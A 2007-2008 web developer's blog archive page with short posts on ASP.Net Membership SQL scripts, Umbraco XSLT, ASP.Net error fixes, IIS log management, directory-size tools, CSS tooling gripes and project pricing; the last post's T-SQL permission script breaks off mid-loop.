Wednesday, January 16, 2008 12:59:38 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Sunday, January 13, 2008

I'm sure I've blogged about this in the past -or perhaps it's just in my "to blog about list" but I thought I would share this little ditty on the Sunday night.

If you ever need to delete a user from your ASP.Net Membership database this is a really useful SQL script to do just that (I often find that the ASP.Net web administration tool throws a SQL Exception while trying to delete a user).

To use the code to delete a user from the ASP.Net membership database simple identify the Guid of the user and enter it where I've written 'THE GUID OF THE USER HERE' and hit go :)

USE ASPNet
GO

DECLARE @UserId uniqueidentifier
SET @UserId = 'THE GUID OF THE USER HERE'

DELETE FROM aspnet_Profile WHERE UserID = @UserId
DELETE FROM aspnet_UsersInRoles WHERE UserID = @UserId
DELETE FROM aspnet_PersonalizationPerUser WHERE UserID = @UserId
DELETE FROM dbo.aspnet_Membership WHERE UserID = @UserId
DELETE FROM aspnet_users WHERE UserID = @UserId

The message I was referring to above usually looks something like the following:

Msg 547, Level 16, State 0, Line 9
The DELETE statement conflicted with the REFERENCE constraint "FK__aspnet_Us__UserI__17036CC0". The conflict occurred in database "ASPNetMemberships", table "dbo.aspnet_UsersInRoles", column 'UserId'.
The statement has been terminated.

I've not looked into why it's happening (I expect it's something to do with an incorrect install on my behalf) but I'm sure there's a solution for it. I know there are a couple of built in SQL scripts i.e. aspnet_Users_DeleteUser but they required more params to get working ;)

Sunday, January 13, 2008 8:37:44 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [4]  | 
# Thursday, January 03, 2008

This mad me smile,  when surfing around at lunch I stumbled across www.heroeshappenhere.com -Microsoft's Visual Studio 2008 launch site. I got all giddy with excitement, downloaded the latest version of Silverlight and woohoo -a registration link! Finally!

Sadly though, you can only register for the LA event at the moment. Check the "Outside of the US" drop down though, it'll make you smile (or at least it did me) -notice anyone missing? (Other than France that is :P)

Thursday, January 03, 2008 2:38:19 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [2]  | 
# Tuesday, November 27, 2007

A project we’re currently working on needs to have interchangeable header images. The theory is to set the header image on the parent page and then unless a template is specified for the page, it should use one of it’s ancestor’s.

Umbraco as a nice control called a “Media Picker” which I felt was perfect for the job as it meant you could easily share header images across the site and it also made sense from a user perspective to have a “Header Images” folder to choose from. The issue from my point of view was how to traverse up the tree until it found a header image to use. Imagine the following site map:

-Home
     -Products
          -Category
               -Product details (Custom header image)

If you’re on the products/category page it should display the header image from Home but when you’re on the product details page it needs to show the specified header image.

So how do you do it? It turns out it’s (fairly) simple using XSLT. The first issue I ran into was getting the URL of the media file from the media picker control, Umbraco offers a useful function to do this for you (well almost!). Using the function umbraco.library:GetMedia you are able to get the details on the file based on the media item id but it includes everything so you then need to use a little XSLT to select the attribute “umbracoFile”:

umbraco.library:GetMedia([XSLT TO SELECT THE FIELD],'false')/data [@alias = 'umbracoFile']

That should give you something along the lines of “/imgs/somefolder/somefile.jpg”

Now how can you traverse up the tree to get the data? Thanks to Morten Bock/Casey Neehouse for helping me understand this XSLT, but the following code should give you the URL of the nearest media item in the tree:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xsl:Stylesheet [ <!ENTITY nbsp " "> ]>
<xsl:stylesheet 
        version="1.0" 
        xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
        xmlns:msxml="urn:schemas-microsoft-com:xslt"
        xmlns:umbraco.library="urn:umbraco.library"
        exclude-result-prefixes="msxml umbraco.library">

<xsl:output method="xml" omit-xml-declaration="yes" />

<xsl:param name="currentPage"/>

<xsl:template match="/">
    <xsl:choose>
        <xsl:when test="$currentPage/ancestor-or-self::node [string(data[@alias='pageBanner'])!=''][1] /data[@alias='pageBanner'] != ''">
            <xsl:value-of select="umbraco.library:GetMedia($currentPage/ancestor-or-self::node [data[@alias='pageBanner']!=''][1] /data[@alias='pageBanner'],'false')/data [@alias = 'umbracoFile']"/>  
        </xsl:when>
        <xsl:otherwise>
            <!-- The URL of the default banner just incase the user removes the homepage banner (would be better as a parameter) -->
        </xsl:otherwise>
    </xsl:choose>
</xsl:template>

</xsl:stylesheet>

Then add a macro to your project and you’re done :). You can see it in action on the new Lucy Switchgear website if you're interested, it's currently being written so it's bound to be a little rough around the edges but do let me know what you think. Our remit was to improve the CMS they had in place making it easier to manage the site and also sort out a few major issues from a SEO perspective. Although altering the design wasn’t part of the initial brief I think you’ll agree the facelift we’ve given the site is for the better (even if it’s just from a usability point of view).

Tuesday, November 27, 2007 6:26:51 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [8]  | 
# Monday, November 26, 2007

Having only recently started to use Umbraco I've taken a couple of days to familiarise myself with the way it works and try and get a few best practices in place, I expect these will be updated over time but you've got to start somewhere ;)

As with any code, I think it's very important to follow a consistent naming convention -whether it's the same one everyone else follows or not, you need to be able to pickup code you wrote months/years/decades ago and still understand it. Your styles will no doubt change over the years but you get the idea.

I've chosen to follow the following "style":

  • Document Types: Lowercase the first letter of the aliases followed by capitals for the new words (similar to Hungarian Notation). Use descriptive names i.e. Home Page for the document type as it'll be client facing. Suffix with "Page" if it is a page document type (as opposed to i.e. a screen shot)
  • Templates: If the template is specifically for a document type, use the same name for the template, if it relates to multiple document types name it logically i.e. "Master Template" or "Left Menu"
  • Macros: Prefix the macro alias with uppercase TSD to avoid conflicts with other macros. Prefix the name with [Source of the macro] i.e. [XSLT] or [User Control]. This is something I picked up from the sample package created by Warren Buckley that I think makes it easier to understand what's going on
  • XSLT Files: Prefix the name with the site's abbreviation i.e. for www.thesitedoctor.co.uk it would be TSD or for www.wineandhampergifts.co.uk WAHG if it's a site specific XSLT file otherwise name conventionally i.e. CamelCase
Monday, November 26, 2007 10:30:56 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, November 23, 2007

I don't know if any of my readers are familiar with Fasthosts' recent security problems that hit the press a couple of weeks ago but I couldn't help but laugh at a conversation I had with them the other day. Baring in mind they had a breach in their security which meant that all passwords had to be reset I was astonished to get this email about an FTP login issue.

Is it just me or is that a little nuts asking a user to send their username and password in clear text just after a major breach in security? I thought my response was very measured:

Friday, November 23, 2007 9:22:41 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, September 21, 2007

It's been rather quiet on my blog recently, if you're wondering why (and don't chat to me on/off-line) I thought I would share with you what we've been working on recently.

For the past month or so The Site Doctor has been developing a new web site (www.wineandhampergifts.co.uk) for Porter and Woodman Gifts Ltd - a local company that produces personalised corporate hampers and gifts. It's been quite a challenge as they have a rather unusual ordering system that allows multiple recipients/addresses multiple items. Looking at it now, it's not so complicated but the delivery charge calculations and initial specs took a while to fully grasp. It's been really enjoyable.

I'll probably cover aspects of the site over the forthcoming months but there are a few really nice features to the Wine and Hamper Gifts site (or at least I think so), some of which the end user will never know about such as the use of generics to calculate the address/recipient/gift variations) and those that they may -for instance the use of the JavaScript1 Zoom function on the product details page (courtesy of LuckyZoom), also the design created by our excellent designer Gareth Brown all adds up to what has to be one of the best sites I've developed to date.

1 Yes, I did just say I've integrated some JavaScript into the site ;)

I doubt most of my readers are interested on the in's and out's of the project itself but from an SEO perspective, I for one am expecting pretty decent results. We opted to use the URL Rewriting ISAPI from Helicon this time round over our usual IISMods URL Rewriting ISAPI as for some reason the IISMods site has been offline for a while (and checking now has been converted into a very weird site).

Another aspect that some people may be unaware of is that the majority of the Wine and Hamper Gifts site operates the same without JavaScript as it does with JavaScript, this is important not only for screen readers but also search engines. There is only one area of the Wine and Hamper Gifts site that I'm aware of that doesn't operate without JavaScript and that is the "Personalise this gift" link on the cart page that allows the user to either edit the existing message or add one that doesn't already exist, that's because it uses a LinkButton, but I may find a way around that later.

Other features that I really like are little things like the way the drop down lists on the left hand menu are created -they're not actually drop down lists but unordered lists that are then manipulated using JavaScript, I think the JavaScript could do with a little tweaking but the result is superb. The Wine and Hamper Gifts site also creates a PDF receipt for the user which is emailed to them, this is something I've been meaning to look into for some time but haven't had the chance, luckily while I was developing the site, Sean Ronan posted to the MsWebDev list about an ASP.Net PDF library iTextSharp (a port from a Java library) which, despite a few oddities from the POV of the Java port does exactly what I wanted. The library is pretty easy to use once you get your head around it and certainly produces some nice results.

There's still more work that's needed to finalise the content and various aspects of the Wine and Hamper Gifts website but if you have a chance, check out the new Porter and Woodman Gifts Ltd Wine and Hamper Gifts website and leave a comment here letting me know what you think :D

Oh, and they've given us a pretty high target to get before Christmas so if you're thinking about treating your customers to a personalised corporate hamper or gift give a little thought to using www.wineandhampergifts.co.uk

AJAX | ASP.Net | C# | CSS | Design | SEO | The Site Doctor | Web Development
Friday, September 21, 2007 11:20:01 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, August 24, 2007

Server Error in '/' Application.


The Controls collection cannot be modified because the control contains code blocks (i.e. <% ... %>).
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Web.HttpException: The Controls collection cannot be modified because the control contains code blocks (i.e. <% ... %>).

Source Error:

 

Line 132:                        metaKey.Name = "keywords";
Line 133:                        metaKey.Content = p.MetaKeywords;
Line 134:                        this.Page.Header.Controls.Add(metaKey);
Line 135:                    }
Line 136:                    if (!String.IsNullOrEmpty(p.MetaDescription))


Source File: a:\xyz\ContentHandler.aspx.cs    Line: 134

Stack Trace:

 

[HttpException (0x80004005): The Controls collection cannot be modified because the control contains code blocks (i.e. <% ... %>).]
   System.Web.UI.ControlCollection.Add(Control child) +2105903
   ContentHandler.Page_Load(Object sender, EventArgs e) in a:\xyz\ContentHandler.aspx.cs:134
   System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +15
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +34
   System.Web.UI.Control.OnLoad(EventArgs e) +99
   System.Web.UI.Control.LoadRecursive() +47
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1061


Version Information: Microsoft .NET Framework Version:2.0.50727.832; ASP.NET Version:2.0.50727.832

Another day, another issue ;)

This had me going around in circles for a while until I realised what it was, if you're getting this error you can bet your bottom dollar that you have <%= %> somewhere in your page's header -furthermore I'd hazard a guess that you've got it in some JavaScript to reference an ASP.Net control on the page- and then you're trying to add a control to the header programmatically (or a custom control from someone like Telerik is trying to). Am I right1?

1 I'm not allowed to ask you to so I won't, but if I was right, then spend that bottom dollar clicking on one of the Google Ads :P

I can't tell you exactly why this occurs but my understanding of it is that ASP.Net can't re-create the header if it has Response.Write somewhere in the header (<%=) -most likely due to when the header is created it's not available (will look into it). No doubt you want to know the fix?

The Fix
The fix is simple, remove the inline code blocks and JavaScript and move it to your code behind i.e.:

string _manageSearch = String.Format( @" 
        function ManageSearch(){{
                var lbl = document.getElementById(""lblFindAGift"");
                var txt = document.getElementById(""{0}"");
                var btn = document.getElementById(""{1}"");

                .Do Something with it..

        }}",

        txtSearch.ClientID);

this.Page.ClientScript.RegisterClientScriptBlock(this.GetType(), "ManageSearch", _manageSearch, true);

Remember: You need to escape the curly brackets otherwise you will get a "String.Format- Exception of type System.Web.HttpUnhandledException was thrown"

Update: Thanks to Julian Voelcker for sending me this alternative "fix" for the problem, can't say I like it though ;) basically instead of using <%= ... %> you would write the databinding expression of: <%# ... %>

Friday, August 24, 2007 10:49:56 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [10]  | 
# Wednesday, August 22, 2007

Type
System.FormatException
Message
Exception of type 'System.Web.HttpUnhandledException' was thrown.
StackTrace
at System.Text.StringBuilder.FormatError()
at System.Text.StringBuilder.AppendFormat(IFormatProvider provider, String format, Object[] args)
at System.String.Format(IFormatProvider provider, String format, Object[] args)
Error Line
0

Just got that message (or at most "Exception of type 'System.Web.HttpUnhandledException' was thrown")? Puzzled? I was the first time I got it, I've been meaning to post about it for quite some time now so seeing as I got it again today I took the hint.

The error is horrifingly obvious when you know about it, in short, you've no doubt got some code that looks like this:

String.Format("<html><head><style type=\"text/css\">body{color: #fff;}</style><body>...");

Can you spot it now? Notice your style declaration is using the curly brackets? Basically String.Format is interpreting that as a placeholder i.e. {0} and is throwing a wobbly.

The solution is simple too, just replace all opening/closing brackets with two i.e:

String.Format("<html><head><style type=\"text/css\">body{{color: #fff;}}</style><body>...");

I hope that helps someone out there :)

P.S. Watch out for methods that use String.Format as they may catch you out in the same way -i.e. Subject of System.Net.Mail.MailMessage

Wednesday, August 22, 2007 9:43:12 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [6]  | 
# Tuesday, August 14, 2007

 What am I doing messing with OS Commerce I hear you cry? Well one of our SEO clients (Florame Organic Aromatherapy) uses a very hacked version of OS Commerce as it's engine and as dire as it is, if it ain't broke don't fix it.

Today I came across (another) error with one of the modules that was installed -the dreaded "1062 - Duplicate entry" error. After a little digging, it wasn't too hard to diagnose, unlike many people (see: 1062 - Duplicate entry fix) this error was being thrown in the product details page. It turns out that since installing the new Froogle feed, the UPC data wasn't being updated, the fix is for you to either remove it and create the UPC by combining i.e. the product code and model number on the fly or to simply validate the new UPC code field is populated.

Easy :) -I hope I saved you trawling through the OS Commerce forums.

Tuesday, August 14, 2007 11:14:15 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [1]  | 
# Wednesday, August 08, 2007

As with my previous post, we upgraded the AJAX framework on the weekend which broke a few things, but one control in particular that broke was our TextChangedTextBox which is based on Pete Kellner's timed postback control. Since updating we were receiving a "'debug' is undefined" error on line 1409 (which was in one of the JavaScript include files).

Having had this issue before I updated the TextChangedBehavior.js but that didn't sort it, I have the latest version of the Futures on the server too so I was lost. Turns out I had an old version of the AJAX Futures DLL within the Bin folder of the project.

So as with my post on the ASP.Net forums before -make sure you update your AJAX Futures when updating your Microsoft AJAX framework!

Wednesday, August 08, 2007 6:20:47 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Wednesday, July 25, 2007

When we got our own dedicated server we needed to start working out a fair number of processes and decide upon a structure that was replicable, scaleable and manageable on a large scale, although the solution we've ended up adopting may not be the best, it certainly works for us.

One thing that has been bugging me however is the location and folder naming convention of the log files -for both the web hits and FTP hits. Typically, shared hosting solutions place the log files under the same folder as the one your website's root is situated but as we had no plans on giving our clients access to these logs this was an unnecessary task so we left them collecting in the default folder.

Leaving the log files in the default folder meant downloading them was very simple, all I needed to do was point our download script at the main folder and that was it, all would be included, the catch however was that the folders weren't named logically* instead they seemed to include some form of ID that was relevant to and assigned by IIS i.e. W3SVC1.

*By this I mean human readable i.e. domainname.com

Until recently I've not worried about analysing the log files beyond one or two clients whom I could manage fairly easily but now with the inclusion of a host of other domains on the server I needed a way of quickly and easily identifying the folders and which domains they related to.

Historically when I needed to know which domain the log folder related to I would log onto the server, open IIS, open the properties of the domain, click on the log file properties and below the folder directory would be the folder name, that's fine if it's only a handful of domains but what when it's say 20? That's 2mins each (with cross referencing etc) so that's 40minutes. I needed an automated system!

As it turns out, Microsoft have been kind enough to provide us with an interface we can easily code against in .Net so after a little Google-ing I wrote a number of little helper applications.

This little console application simply loops through all the domain names on the server it's being run on (the default instance of IIS) and outputs the relevant log file and folder path into a handy text file. I'll post in another post about how I use this file.

For convenience's sake I have this run on a nightly basis and the text file output to the root of the log file directory, that way when I download the logs during the next day I get the latest update of log file locations and domain names :)

Download the IIS WWW and FTP log file location exporter.

1 Year Update: I've posted the source for the IIS WWW and FTP log file location exporter here.

Wednesday, July 25, 2007 4:18:42 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [2]  | 
# Thursday, July 19, 2007

After a number of months of hearing how great Microsoft's latest web development environment is -Microsoft Expression Web- I thought I would install it in place of Dreamweaver on my new laptop. I was -until today- pretty impressed with some of it's features, how well it handles CSS within the IDE and had no reason to complain.

That was until today. As I write this, I'm sitting in our apartment in Croatia with the sun beating down on me, generally enjoying life. As it's incredibly hot outside around noon, I thought it would be a good idea to crack on with some work on the new The Site Doctor design -which I hope to have online shortly after I return. So I load up Microsoft Expression Web and the various pages of the new site and crack on.

I've already sorted the CSS for the site so there was no need to open any of the files or make alterations to them however I like to have them open so I can check class names and ids as I work. When I switched over at one point, I noticed that my nice, neat and tidy CSS file of around 190 lines was suddenly closer to 300. I couldn't work it out until I noticed that Microsoft Expression Web had separated out all my group declarations into separate declarations such i.e.:

a, a:link, a:visited, a:active{
text-underline: none;
}

Became:

a:active{
text-underline: none;
}
a:visited{
text-underline: none;
}
a:link{
text-underline: none;
}
a{
text-underline: none;
}

Well done Microsoft, I thought you would have learnt your lesson after the fiasco that was Visual Studio 2003's HTML editing, what on earth were you thinking? I'm sure this is a simple setting I need to change (and I can understand why they've done it) but not having Internet access here there's no easy way of finding out (I've searched the help files) which means hours of careful CSS architecture have been completely trashed.

So, as soon as I realised, I spent about 20 minutes meticulously working through the bunch of CSS files open reversing the mess Microsoft had made of them and promptly closed them, safe in the knowledge Microsoft Expression Web can't mess with them again. Or so I thought.

A short while ago I needed to open one of the CSS files again to alter a few declarations and to my horror I found that the declarations had been ungrouped. I can't believe it, not content with simply altering the CSS files that are open, Microsoft Expression Web actually alters the CSS files on the FSO without you knowing.

If you're ever thinking about using Microsoft Expression Web for CSS development then don't expect your files to be neat and tidy, in my case I would say the files were increased in size by almost 5x which ok may be 1Kb --> 5Kb but if you're getting tens of thousands of hits a day, that's a serious bandwidth increase.

Not a happy bunny.

Thursday, July 19, 2007 11:02:32 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [6]  | 
# Monday, June 18, 2007

Since getting our own dedicated server a couple of years ago we’ve had a fairly step learning curve which a lot of the time has been a tad hit-and-miss (never at the detriment of our customers I might add). Luckily we’ve had the superb support of Rackspace behind us but as others may not be so lucky, I thought I would post up a few nuggets we’ve received over the years. As I remember more, I’ll add additional posts.

Domain/Folder organisation

One of the first issues we came across (and I’m sure many people have already got into this position) was the structure of the folders on both the server and development machines. The solution we came up with was to have a common folder –for argument’s sake lets call it “WebsitesFolder”. Within “WebsitesFolder” you then create a new directory for each domain name and finally within that, a folder for each subdirectory i.e. www, blogs etc.

By creating a new folder for each subdomain, you are able to quickly find the correct folder for the domain. Then locally you are able to store the source files outside of the site’s root which will (or should) speed up your FTP transfer process as you won’t need to select which files to upload1. The structures might then look like this:
Development server

  • /domain.com
    • /www/
    • /subdomain/
    • /Source Imagery/
    • /Some Irrelevant Folder/
  • /domain2.com
    • /www/

Production server

  • /domain.com
    • /www/
    • /subdomain/
  • /domain2.com
    • /www/

1It might also be worth you checking out SyncBackSE which is an excellent FTP client that only uploads files you have changed since the last transfer. It also has the added advantage that it has customisable filters allowing you to ignore source files and folders as _notes, .cs, .vb etc. http://www.2brightsparks.com/syncback/sbse.html

Finding large directories

The other day I noticed that one of our server’s disk space was running a little low but as far as I was aware there was plenty of space left. As we tend to store all client data within set folders I was able to quickly identify that it wasn’t the client folders that was taking all the room so what was?

When you don’t know which folders are taking the space, there are a couple of tools you may find useful. The first I was told about was TreeSize (http://www.jam-software.com/freeware/index.shtml) -a free program that gives you a graphical representation of each folder’s usage:

It then allows you to quickly traverse the directory structure and identify the offending directory. There’s a load more information available through the easy-to-use interface but if all you want is a number it’s a little overkill.

The alternative to TreeSize

A heading? Just for this? Yes –this little tool is the Mac Daddy of directory size info as far as I’m concerned as it’s a free (we like free ;)) command line tool found on Microsoft’s site called “Directory Disk Usage” –DIRUSE.

DIRUSE is really easy to use, simply load up CMD and type in:
diruse /m /* c:\
and you’ll get a report of your chosen folder’s sub folders, related sizes and a count of the files within it. Ok it’s iteration can be a little slow but it gives you all the information you need quickly and easily.

The syntax is as follows:
DIRUSE [/S | /V] [/M | /K | /B] [/C] [/,] [/Q:# [/L] [/A] [/D] [/O]] [/*] DIRS

/S
Specifies whether subdirectories are included in the output.
/V
Output progress reports while scanning subdirectories.  Ignored if /S is specified.
/M
Displays disk usage in megabytes.
/K
Displays disk usage in kilobytes.
/B
Displays disk usage in bytes (default).
/C
Use Compressed size instead of apparent size.
/,
Use thousand separator when displaying sizes.
/L
Output overflows to logfile .\DIRUSE.LOG.
/*
Uses the top-level directories residing in the specified DIRS
/Q:#
Mark directories that exceed the specified size (#) with a "!".
(If /M or /K is not specified, then bytes is assumed.)
/A
Specifies that an alert is generated if specified sizes are exceeded. (The Alerter service must be running.)
/D
Displays only directories that exceed specified sizes.
/O
Specifies that subdirectories are not checked for specified size overflow.
DIRS
Specifies a list of the paths to check –you can use semicolons, commas, or spaces to separate multiple directories if required.

Note: Parameters can be typed in any order. And the '-' symbol can be used in place of the '/' symbol.

Also, if /Q is specified, then return code is ONE if any directories are found that exceed the specified sizes. Otherwise the return code is ZERO.

Example: diruse /s /m /q:1.5 /l /* c:\websitesfolder

Monday, June 18, 2007 10:24:35 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Thursday, June 14, 2007

I’ve been meaning to post about the use of AccessKeys on websites now for some time (I wrote the post but never completed the list at the end). Then, this morning I saw a post from Tony Crockford on the WAUK list along similar lines so thought it was time I got the post online :)


Just before Christmas, we were looking for a new house so I was spending an increased amount of time on Rightmove and it really started to bug me. I’m really pleased by the fact that they tried to make their site simpler to navigate by introducing AccessKeys to their pages but in my view they’re defeating the purpose of them by overriding browser shortcuts. In this case, the one I’m referring to is the use of Ctrl+K which I use a lot to access Firefox’s search bar.

Why oh why have they chosen to override this key combination, in IE it’s not too irritating as it doesn’t activate the link, in Firefox however it automatically loads the link, so I’m forever being sent back to the buying homepage.

I can understand that they want to make the key relevant, but what does “K” have to do with buying? I could understand if they were overriding “B” –and it wouldn’t bother me as it’s related, but K? I realise that it’s unpractical to avoid all shortcuts in all browsers but I would have thought they’d look into the main shortcuts first.


I had planned to compile a list of common shortcuts but I’ve not had time yet –another thing on the list ;). What’s interesting however is that since I wrote this post in January, they’ve replaced a couple of the shortcuts already –Buying is now “B”.

So what’s Tony Crockford got to do with this all? Well he referred the list to the WCAG Samurai’s point on AccessKeys which I think is a valid one:

So there you have it, just don’t ;) -I think that now there are so many different browsers out there it’s impossible to account for them all so it’s probably the best methodology.

Thursday, June 14, 2007 8:02:59 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, June 08, 2007

This has to be my laziest post yet, it's just a paste of the press release but I'm to excited at the thought of free beer to re-write it ;) -Hope to see you there, shout if you're going.


Chinwag Joins Forces With Top Software And Media Brands For Supersized Digital Networking Party

The UK digital media industry is gearing up for a soiree of grand proportions in July at Chinwag's Big Summer 07 networking party (http://bigsummer07.chinwag.com).

Giving the bash an extra boost - and supporting the inventive and fun entertainment programme, plus the lavish refreshments on site - are Chinwag's three party partners: Adobe (http://www.adobe.com/), Channel 4 (http://www.channel4.com/), and Purple (http://www.purple-consultancy.com/).

The free event, to be held at the historic Imperial College Union in Kensington, London, will be the largest-scale bash of its kind for people working in the digital sector, with the party encompassing 5 large rooms and the enclosed quadrangle, allowing a total capacity of 2,000 revellers at any one point in time.

Hosted by new media community Chinwag, it will to bring together professionals in web, mobile and other interactive media to make useful connections, celebrate the return of the new media sector as a sustainable growth industry, and mingle in style in the sunshine of a London summer's evening.

Dominic Eames, editor, Online, at Channel 4 New Media said: "Channel 4 is always open to new ideas from the New Media community and is delighted to support Chinwag in this event.

Toby Thwaites, managing director of Purple said: "Having worked with the team at Chinwag for a number of years I am delighted that Purple are able to support what will undoubtedly be the Digital event of the Summer"

Sam Michel, Chinwag MD and founder said: "This is a great opportunity for the new media industry to do some "First Life" networking. The UK scene is buzzing with life, and it's great to bring everyone together en masse."

"The party takes place on July 5. More details will be released in the forthcoming weeks with promotional activities, partnership with brands, and innovative use of social networking tools and technologies such as Facebook and Twitter included in the mix."

More information & registration: http://bigsummer07.chinwag.com

About Chinwag

Chinwag aims to be a connecting rod for ideas and talent across the new media industries. Having provided Internet-based community forums, websites, email newsletters and consultancy for the new media sector since 1996, its website (http://www.chinwag.com) will be re-launched in July, aggregating information for the digital industries and updating its community focus. In February 2007 the Chinwag Live events series (http://live.chinwag.com) was launched. Topical panel discussions founded to cast light on issues and trends affecting the new media industries, the monthly sessions have also gone on tour to Internet World and Ad:Tech.

In addition, Chinwag publishes Chinwag Jobs (http://jobs.chinwag.com), the leading recruitment website for online marketing, digital media, web, design and technical positions. It is used by the BBC, MySpace.com, Yahoo!, Amazon, Vodafone and the majority of recruitment agencies who place staff in the sector.

Chinwag - Connecting New Media People

Site: http://bigsummer07.chinwag.com

Friday, June 08, 2007 12:39:02 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [1]  | 
# Wednesday, May 16, 2007

We’ve gone around in circles at The Site Doctor trying to decide the best method to calculate project costs and timings, historically I would look at the project brief, have a think about how much I wanted to work for a client and then I would –in effect- pluck a figure out of the air.

As your company grows however you will need to think about a more scalable, resilient solution that reduces the chance of under quoting and I think we have a fairly nice solution so I thought I would share it :)

Firstly, read up on how to set your base rate (see: Pricing your work). Once you have calculated your base rate, you will need to download this spreadsheet when offering the client various options, each option is given its own row on the summary table which is calculated off a dedicated sheet of times.

The formatting is fairly simple and mainly for your own use but basically the main areas of development (i.e. the front end, my account or admin areas) use a grey background. The sub sections of these (i.e. Product management) use a yellow background and all other items have a white background, the main reason for this was when you have a large project it made it a lot easier to identify where you were. The top columns are not set but they’re just what we most commonly use, you can alter these as needed on the summary sheet.

How to use it

  1. Add all your site elements (usually based on your sitemap) into the first column, separating each one out onto its own line.
  2. Go through each item, estimating the time required to complete the task. Remember that the spreadsheet is using decimal hours:
    • 0.02 = 1 minute
    • 0.08 = 5 minutes
    • 0.17 = 10 minutes
    • 0.25 = 15 minutes
    • 0.33 = 20 minutes
    • 0.42 = 25 minutes
    • 0.50 = 30 minutes
    • 0.58 = 35 minutes
    • 0.67 = 40 minutes
    • 0.75 = 45 minutes
    • 0.83 = 50 minutes
    • 0.92 = 55 minutes
    • 1.00 = 60 minutes (1 hour)
  3. Switch over to the summary page and update the hourly rates to your rates
  4. Et voila you have your project’s estimated cost :)

You’ll be surprised how quickly project costs mount up when you use this method but it does ensure that you don’t get caught out, if it is still too costly for the client, why not show them the breakdown as it quantifies your efforts nearly. If that doesn’t work see how tweaking your hourly rate or removing the timings works out but don’t be a busy fool ;)

Project time estimate spreadsheet

Wednesday, May 16, 2007 2:42:04 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [2]  | 
# Wednesday, May 02, 2007

I can’t recall how I came across FreelanceSwitch because it was one of those links you see on a mailing list, open to read later and forget to read until a couple of days/weeks later, but nevertheless FreelanceSwitch is well worth a read as they have a tonne of massively useful advice and they seem to be adding stacks more!

Scott Wills also posted an interesting read on getting the price for your work right. This article on pricing your work, Scott briefly touches on how to set a base rate for your work but concentrates more on estimating your time etc so if you’re interested in calculating your price or calculating a base rate for your work, have a read of my article on pricing your work (see: Pricing Your Work) as I feel it covers calculating a base rate for your work in more detail. Scott's article can be found here: The Price is Right on FreelanceSwitch.

FreelanceSwitch also gave my article on business start up advice a shout the other day which was most flattering –I hope I’ve managed to pick up a few additional readers! Hello if you're new :). You can read the list of other useful links and see mine at: Linkswitch -a roundup of great links across the web 3.

The long and short of it is to keep an eye on the FreelanceSwitch website at: http://freelanceswitch.com/.

Wednesday, May 02, 2007 7:24:54 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Tuesday, May 01, 2007

We have recently moved over to SQL Server 2005 and as part of this transfer I decided to aggregate two separate ASP.Net Membership databases that were created purely out of error.

For those of you who don’t already know, you can happily run more than application’s security from a single membership database as long as you correctly configure the web.config’s security settings –for more information on doing that see my post on having dual records in the ASP.Net authentication table (see: Dual Records In The ASPNet Authentication Table). The important attribute/value set to configure if you are planning on running more than one application from the same roles database is “applicationName”. If you do not set “applicationName” you will find that users can log in across all your applications, roles/access levels will get mixed up and a whole bunch of other hullabaloo!

Luckily for me, the only records stored in one of the membership databases were two users, both of which I knew the password to so I decided I would simply update the web.config with the new database connection string and add them manually.

The next thing I wanted to sort however was the specific SQL Login’s access to the membership database, previously I simply added the user to all the various aspnet_ roles that were in the database which worked fine. As I’m looking to use this database for other applications in the future and I don’t like sharing usernames/passwords across applications, adding the roles each time would become a real PITA so I decided to add a new role with all the access required for the database so I could simply add the user to this new role. I called the role IIS_User.

A number of our applications build on the foundation of the ASP.Net Membership database with application specific values and so I tend to have another table for the application’s users within the applications specific database to store these values. The user has the usual UserId (usually an int) and a uniqueidentifier which allows me to link the two database together. With this in mind, I need additional access to the ASP.Net Membership database –SELECT permission on the tables. I don’t like adding more permissions to a role than needed but I needed a method of doing this quickly –assigning EXECUTE and SELECT permissions to the new role on the various tables/stored procedures. In time I’ll revisit this and work out which are needed by the role and remove the permissions not needed but for now this’ll do :)

The quick and dirty T-SQL

DECLARE @SQL nvarchar(4000),
    @Owner sysname,
    @objName sysname,
    @Return int,
    @objType nvarchar(5),
    @rolename nvarchar(255)

SET @rolename = 'IIS_User'

-- Cursor of all the stored procedures in the current database
DECLARE cursStoredProcedures CURSOR FAST_FORWARD
FOR
SELECT 
    USER_NAME(uid) Owner, 
    [name] StoredProcedure,
    xtype
FROM
    sysobjects
WHERE
(
    xtype = 'U'
  OR
    xtype = 'P'
)
  AND
    LEFT([name], 7) = 'aspnet_'

OPEN cursStoredProcedures

-- Get the first row
FETCH NEXT FROM cursStoredProcedures
INTO @Owner, @objName, @objType

-- Set the return code to 0
SET @Return = 0

-- Encapsulate the permissions assignment within a transaction
BEGIN TRAN

-- Cycle through the rows of the cursor
-- And grant permissions
WHILE ((@@FETCH_STATUS = 0) AND (@Return = 0))
